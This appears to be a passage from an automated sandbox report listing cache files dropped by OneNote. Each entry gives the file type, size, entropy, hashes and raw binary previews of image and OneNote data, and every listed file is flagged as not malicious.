Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.362949092859627
Encrypted:	false
SSDEEP:	48:bsS3hx4DuF6xqwttUEQ24XB9wTj4ZrdMrmNWdXFI4uVnq6pr9Qdg:bsiX6xqwtWEWXB9wTcRMFctQd
MD5:	E5253662A0B8C2476C2D3834713E7299
SHA1:	083DA724735D11F7F270D99FBCFDBADF31298598
SHA-256:	55ECC7198520B61636D83AD7FA21E70BAD278D0BA3D1BE267F50644B30CA6A72
SHA-512:	C704A0D23A6D4A8FCC96F4770B56EA30733ED4DAB18B1D1A64E5123A82F3C674A5663302DDA2448AC71DA2644050702A8CDD746903AC8D741ACD42CA68998756
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ..@.......@..@{......m3..@..@{......m3..@..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............L..h..5.%...5f....N...^..................`B\|.J..m..n.F........H........................................I.qk..B.....LZ.............L..h..5.%...5f.........L..h..5.%...5f...........@.......@.......@...........................................@j......@T.^....@.......@..B....@..C....@..>....@..\|....@ .3...................;........4...4...4.."................@...@...@..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4...........@.......@....#..@............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	2.941351060644542
Encrypted:	false
SSDEEP:	384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
MD5:	ACF4A9F470281F475EA45E113E9FB009
SHA1:	B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
SHA-256:	5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
SHA-512:	998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
Malicious:	false
Preview:	....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..\|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	5.318266117301791
Encrypted:	false
SSDEEP:	96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
MD5:	5C859FF69B3A271A9AAB08DFA21E8894
SHA1:	3156302A7450ADFF4D1B6EC893E955D3764D4DD4
SHA-256:	B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
SHA-512:	4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
Malicious:	false
Preview:	.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.376306786910849
Encrypted:	false
SSDEEP:	96:4sMYQOGBzkEsAow3XrE9wQqjKRMPEm5KwdmO8P:4sMYQOGBtsAow3XA9wQ6KRMPEmYwdmHP
MD5:	6585F53C13CF299A7AA3746B052A6581
SHA1:	7D3D5D57B5C459DF55D89AF208C7FEECC8534573
SHA-256:	30427DC11CCF56250E536F8A593F4BE1A5E15856083FC392E7A7DF5CA4438C02
SHA-512:	5E5FAE4A1840923C87A03A01DE4F84D5BFDAA29B49E43255D6CAE3184FD57F39643EF558E04881AC0AD55032A8E455EEB70D4D2D9E36ED43AE412D285A05BD6B
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..........t....K.......t....K........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............P=.9..S.3..~o.pm....N...^................:-..p.H.&...#p........f........................................I.qk..B.....LZ............P=.9..S.3..~o.pm........P=.9..S.3..~o.pm....................................................................j......T.]............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4......................#*..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	7.252780160030615
Encrypted:	false
SSDEEP:	48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
MD5:	F6C596F505504044DF1E36BA5DA3F09B
SHA1:	BCF17EC408899B822492B47E307DE638CC792447
SHA-256:	EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
SHA-512:	E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
Malicious:	false
Preview:	.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.297796387337245
Encrypted:	false
SSDEEP:	48:Wsbic0enCMSw0a3fDtr48HfE2JlZIBX59RsjpyxrdMrlhZqFXf8Jndj0mzYg:Wsi5rGfDR48/E2qX59RKsRMtqWY
MD5:	EC6031FE9DD687870218C548414310A5
SHA1:	2288E69F018A07938B900E516423DB2FD2374C32
SHA-256:	E81F7C73AB5C7117E6DD057021F6541277E9A8F060EC8D9AE30B1CCB6ED11BC4
SHA-512:	9610DBF555014AB3101EE893FFBDFAAE464060CA5F73C7E36463A855C5665A2AD661D7C4613FB9503E823CC674CEAD8B18AB262EBA8F5303F1BCD97148C93164
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.............;...kkY.\.B.....;...kkY.\.B.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............'.w......HB".....N...^.................n...LO...UUG.z........f........................................I.qk..B.....LZ..............'.w......HB"...........'.w......HB".........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.341784257816472
Encrypted:	false
SSDEEP:	96:IsRQMNEnp/DyEQeXYx9JYlboRMReZ+M9d1H6:IsRQM6nprQeXw9JqoRMIZ+M9d1H
MD5:	21447CC838C9D370344AE808E2785875
SHA1:	9222AF1CD150029F8FDFE5F2A676BC7E0E58A89F
SHA-256:	0BB7494043E0EAA6684B28E851FE73D1F5D4E57C915118E37812AE0A99E37894
SHA-512:	CE6A5EA5831E501F9409092C493B2E6B6EC9E74E2B9AED16C34AE5AABCA64381D72EF701068348059C327650C412AF676BF958C033EA76C0E86B8DD372025907
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.K'......K'.v...%K.@..?.K'.v...%K.@..?.K'..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............R...c..q.5. ;X....N...^................Y..dC..j.............f........................................I.qk..B.....LZ..............R...c..q.5. ;X..........R...c..q.5. ;X..........K'......K'......K'..........................................K'j.....K'T.]...K'......K'..B...K'H.....K'..B...K'..>.).K'..J...................;........4...4...4.."...............K'..K'..K'..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........K'......K'....#.K'............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
Category:	dropped
Size (bytes):	36740
Entropy (8bit):	7.48266872907324
Encrypted:	false
SSDEEP:	768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
MD5:	9C205C8D770516C5AA70D31B2CA00AF3
SHA1:	9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
SHA-256:	E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
SHA-512:	A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.475181176955499
Encrypted:	false
SSDEEP:	96:y8scFb6HiEOELu6Xr9B6kRMrUiEFdFkFkFkFdFj2FeFg:y8so6HFbLu6Xr9B6kRMrUi4
MD5:	9B35B43C3A1D16B7DF32CC866ADCE452
SHA1:	8D98A556C267DD78894948BC9924584B2E0E4C9A
SHA-256:	E693A58677C38EFC044AED8992B0024B342C6268738811264EA4C4CC7F87DDB2
SHA-512:	60181F6B1FA9CE43878382A4310DA9C72E089080049631E3005D57669124808423B0AA3523D2ECCC4A3767000D149C4266C2C35934557AB880E504757A258457
Malicious:	false
Preview:	2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZ.h}......h}\.:4. .....h}\.:4. .....h}..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................Y..............N...^....................9L...F..i........f........................................I.qk..B.....LZ...............Y.....................*Y....................h}......h}......h}..........................................h}j.....h}T.]...h}......h}..B...h}H.....h}..B...h}..>.).h}..J...................;........4...4...4.."...............h}..h}..h}..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........h}......h}....#.h}............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.353943418447345
Encrypted:	false
SSDEEP:	48:GBsEqzPPbziPteEEEXDJuaXC691Hs3mpylrdMrtGKFX8aBCY6vfc+/IwGBanke:GBsEcPviPEEXbXC691HXARMzj68+/IW
MD5:	1E2B6F30EA0CCF0E7D6EDF3BAC52B107
SHA1:	B1FA76B05B1EE9205BA863C7AADFB99F21CC526A
SHA-256:	F3BDABABF4DA05FBD3E4740F376A573468AAA6144051DF8BA90454CE08AD89FD
SHA-512:	443235FAAA07B44ABB32DA47934A8B4FE8303AF7AA57C9113EBF558F0ACBB87639D83D16094C7571DF8B8CD3D373A05146C598BE1FB4D810F53139CC7F0A05AF
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZA.;.....A.;2#...?.&.V...A.;2#...?.&.V...A.;..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............mC.q..%n..1B......N...^.................X..~.C..:.H}J.........f........................................I.qk..B.....LZ............mC.q..%n..1B..........mC.q..%n..1B...........A.;.....A.;.....A.;.........................................A.;j....A.;T.]..A.;.....A.;..B..A.;H....A.;..B..A.;..>.)A.;..J...................;........4...4...4.."..............A.;.A.;.A.;..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........A.;.....A.;....#A.;............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	60924
Entropy (8bit):	7.758472758205366
Encrypted:	false
SSDEEP:	1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
MD5:	D58C51D2CF586A5E14A9EC8529C3B0A8
SHA1:	F4811A353797C29B1E3F5A61B125C46E1534D587
SHA-256:	F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
SHA-512:	34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.........................................................yK..xd...6..\|%....\j..e.=...Y..f..I.\|-....e...$R.j.......~.W#....{.....V.k.\|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.\|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.......................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.367938389716958
Encrypted:	false
SSDEEP:	48:osxc4TiIMtucEJtXLcX0oc9dsGpylrdMrj1tFXsQF9tFN:osLiIMdE8X0d9dngRMJtBX
MD5:	3ABA404A41D887E6EF08B33F4BAF6532
SHA1:	35B347558DFA5775A2AB1001E79A28E53A6B74EB
SHA-256:	98FA3D4091E36898B0636431B474B1E93923B60E3B0A5D80C68B4CB05BA4032E
SHA-512:	D7F2FE50F55189C7637E7457B4A355AC21FDBD7A41F5C86CF5EBDE64254052D517658642A3B082A47801624B2D47F76C3DB1CBEC52E4A086D736C7B44C91F49E
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..U.......UT..2..2.\ ...UT..2..2.\ ...U..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............<..@.=\|..S.b.....N...^.................9....D..Ln.:n........f........................................I.qk..B.....LZ..............<..@.=\|..S.b...........<..@.=\|..S.b............U.......U.......U...........................................Uj......UT.]....U.......U..B....UH......U..B....U..>.)..U..J...................;........4...4...4.."................U...U...U..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........U.......U....#..U............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 579, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	515
Entropy (8bit):	6.740133870626016
Encrypted:	false
SSDEEP:	12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
MD5:	E96BE30D892A5412CF262FEE652921CA
SHA1:	8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
SHA-256:	0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
SHA-512:	D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
Malicious:	false
Preview:	.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.345081105783185
Encrypted:	false
SSDEEP:	48:asOtarMiZtpatfFxwEPA8ENXT2a99sqpylrdMrzhkCRzFXIwxS73QIg:asnMiTpaCEPkXJ99zIRMzCezbozQI
MD5:	8F4B8048B32F1FB45FF805FE47098C5A
SHA1:	E0FFD4681379FA3085A1454647BA3E61F08529C0
SHA-256:	00ADE2A9920C3BD94B52E1699E318CD8DCD2E2B7D92CE9D205A8A1C5BF885F62
SHA-512:	EFBF7DE72748F7514A9ACE6E0C8149926D4FBD057178A79B19D6BB877E2BCC1F17AA96EBE0E3312E3BBBCD43CF91734BB14634A85F383EFB81873ECEB06CC4EF
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ1.......1..j.1..5S?....1..j.1..5S?....1....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............{..#..f.".<...v.....N...^.....................PD.WC.............f........................................I.qk..B.....LZ............{..#..f.".<...v.........{..#..f.".<...v..........1.......1.......1...........................................1..j....1..T.]..1.......1....B..1..H....1....B..1....>.)1....J...................;........4...4...4.."..............1...1...1....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........1.......1......#1..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 30 x 700, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1547
Entropy (8bit):	6.4194805172468286
Encrypted:	false
SSDEEP:	24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
MD5:	0BA36A74DFBF411FAB348404CCEC3348
SHA1:	4C619790E517416E178161028987DF1CD3B871CC
SHA-256:	2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
SHA-512:	90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
Malicious:	false
Preview:	.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.314679629287676
Encrypted:	false
SSDEEP:	48:CsTyPmF83zJthnE05zejmXQpyP9GKUIypyhrdMr7ZH3fWFXvFamYhAd:CshmzJDEGXys9GtBERMEH+A
MD5:	BBDF8A0155CB3535AEB89539CB51B956
SHA1:	BB86FF551D2991D1BCBB004F28A38FDBA602E09E
SHA-256:	F445C717F4A59BF10091D6BECD3BC40A2817CF375FCC42B6BFC75DC9A31384D2
SHA-512:	2AC30DF74A9A6D9D161F168E2F911328C7DA7122DE143F20BE170C8F806C095F40372303AAF9AE93691A906F506091C5DE4FDF23CAD56A20728F1368BD2859F0
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ.a.......a.C.......X.y.a.a.C.......X.y.a.a...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............K.8I.......(;....N...^.................~...NL..]..h........f........................................I.qk..B.....LZ.............K.8I.......(;.........K.8I....*...(;..........a.......a.......a...........................................a.j.....a.T.]...a.......a...B...a.H.....a...B...a...>.).a...J...................;........4...4...4.."...............a...a...a...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........a.......a.....#.a.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	95763
Entropy (8bit):	7.931689087616878
Encrypted:	false
SSDEEP:	1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
MD5:	177DD42CA99CAA2CCBF2974221680334
SHA1:	35FD86B3DD082A6D4930C67BC0E05D3B5817465A
SHA-256:	525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
SHA-512:	6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
Malicious:	false
